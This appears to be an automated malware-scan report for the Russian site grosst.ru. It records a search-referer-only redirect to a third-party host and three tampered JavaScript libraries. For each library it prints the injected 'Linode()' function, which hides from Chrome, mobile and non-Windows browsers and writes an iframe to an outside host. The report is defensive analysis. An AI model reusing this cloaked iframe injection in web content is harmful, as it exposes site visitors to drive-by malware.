Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grosst.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
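URL: http://grosst.ru/ (request simulating a visitor arriving from a search engine) GET / HTTP/1.1 Host: grosst.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Mon, 29 Sep 2014 01:20:27 GMT Location: http://tuttomariorestaurant.com/cache/mod_login/tutto/a.php Server: Apache Content-Length: 0 Content-Type: text/html; charset=windows-1251 Expires: Mon, 29 Sep 2014 01:20:27 GMT | malicious |
Note: the same URL is listed under "Scanned pages/files" with a 200 OK response rated clean. This suggests the 302 to the third-party host is served only when the request carries a search-engine Referer, so a check that requests the page directly may not observe the redirect.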
Scanned pages/files
Request | Server response | Status |
http://grosst.ru/ | 200 OK Content-Length: 24224 Content-Type: text/html | clean |
http://grosst.ru/media/system/js/caption.js | 200 OK Content-Length: 2690 Content-Type: application/x-javascript | clean |
http://grosst.ru/templates/final3/js/prototype.js | 200 OK Content-Length: 126855 Content-Type: application/x-javascript | malicious |
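Malicious code - confirmed by antiviruses (see below). The injected function Linode() reads navigator.userAgent and, only when none of the listed substrings is present, calls document.write to emit an iframe whose source is a third-party host. The excluded strings cover Chrome, mobile and non-Windows platforms and a "Screenshot" agent, so clients identifying as any of these would not be served the iframe. The scanner excerpt breaks off inside the iframe URL and resumes with what appears to be the library's own code. The same snippet is reported in three scripts under /templates/final3/js/, which suggests the files themselves were modified on the server; comparing them against known-good copies of the libraries would confirm this.
function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://quwalda.kashyap1.com/jsrtj
[... excerpt truncated by the scanner ...]
add: function(classNameToAdd) { if (this.include(classNameToAdd)) return; this.set($A(this).concat(classNameToAdd).join(' ')); }, remove: function(classNameToRemove) { if (!this.include(classNameToRemove)) return; this.set($A(this).without(classNameToRemove).join(' ')); }, toString: function() { return $A(this).join(' '); } }; Object.extend(Element.ClassNames.prototype, Enumerable); Element.addMethods();
Antivirus reports: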
| ||
http://grosst.ru/templates/final3/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 3377 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The injected function Linode() checks navigator.userAgent against a list of substrings and, when none matches, writes an iframe pointing to a third-party host. The scanner excerpt breaks off inside the iframe URL and resumes with what appears to be the library's own loader code.
function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://quwalda.kashyap1.com/jsrtj
[... excerpt truncated by the scanner ...]
return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/)) }).each( function(s) { var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,''); var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load();
Antivirus reports:
| ||
http://grosst.ru/templates/final3/js/lightbox.js | 200 OK Content-Length: 19204 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The injected function Linode() checks navigator.userAgent against a list of substrings and, when none matches, writes an iframe pointing to a third-party host. The scanner excerpt breaks off inside the iframe URL and resumes with what appears to be the library's own code.
function Linode() {
var d = navigator.userAgent; var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1); if (!f) { document.write('<iframe src="http://quwalda.kashyap1.com/jsrtj
[... excerpt truncated by the scanner ...]
windowHeight = document.body.clientHeight; } if(yScroll < windowHeight){ pageHeight = windowHeight; } else { pageHeight = yScroll; } if(xScroll < windowWidth){ pageWidth = xScroll; } else { pageWidth = windowWidth; } return [pageWidth,pageHeight]; } } document.observe('dom:loaded', function () { new Lightbox(); });
Antivirus reports:
| ||
http://grosst.ru/material | 200 OK Content-Length: 19693 Content-Type: text/html | clean |
http://grosst.ru/material/mex | 200 OK Content-Length: 19704 Content-Type: text/html | clean |
http://grosst.ru/material/kirza | 200 OK Content-Length: 19756 Content-Type: text/html | clean |
http://grosst.ru/material/natko | 200 OK Content-Length: 18943 Content-Type: text/html | clean |
http://grosst.ru/price | 200 OK Content-Length: 14042 Content-Type: text/html | clean |
http://grosst.ru/price/pricemex | 200 OK Content-Length: 14058 Content-Type: text/html | clean |
http://grosst.ru/price/pricekirza | 200 OK Content-Length: 13861 Content-Type: text/html | clean |
http://grosst.ru/price/natkots | 200 OK Content-Length: 14149 Content-Type: text/html | clean |
http://grosst.ru/online | 200 OK Content-Length: 14213 Content-Type: text/html | clean |
http://grosst.ru/news | 200 OK Content-Length: 14654 Content-Type: text/html | clean |